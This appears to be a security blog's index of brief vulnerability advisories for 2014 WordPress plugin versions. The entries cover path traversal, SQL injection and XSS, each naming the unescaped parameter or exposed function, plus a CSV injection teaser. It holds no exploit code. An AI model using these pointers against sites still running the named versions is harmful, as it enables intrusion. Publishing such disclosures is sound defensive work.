Vulnerabilities
DukaPress 2.5.2 Path Traversal
REQUEST['src'] is passed directly into file_get_contents function.
13-11-2014
1 MIN READ
Vulnerabilities
Google Doc Embedder 2.5.14 SQL Injection
$_GET['gpid'] is not escaped.
11-11-2014
1 MIN READ
Vulnerabilities
Contact Form Maker 1.7.18 XSS
_form_makercfm() is accessible for every registered user.
09-11-2014
1 MIN READ
Vulnerabilities
Link Library 5.8.10.6 Reflected XSS
$_GET['searchll'] is not escaped.
08-11-2014
1 MIN READ
Vulnerabilities
WP Photo Album Plus 5.4.17 Reflected XSS
$_GET['walbum'] is not escaped.
06-11-2014
1 MIN READ
Vulnerabilities
WordPress Smart Forms 2.1.0 XSS
_rednao_smart_forms_save_formvalues function is accessible for everyone through admin-ajax.php
06-11-2014
2 MIN READ
Vulnerabilities
Ninja Forms 2.8.6 Reflected XSS
$_REQUEST['update_message'] is not escaped.
06-11-2014
1 MIN READ
Vulnerabilities
WP Contact Bank Standard Edition 2.0.69 XSS
Datas from checkboxes are not escaped and validated when added to database.
05-11-2014
1 MIN READ
From 0 to pentesting hero
CSV Injection
It may be found on every website that allows for exporting data to CSV format. But how the text format can be used for the attack?
27-03-2019
2 MIN READ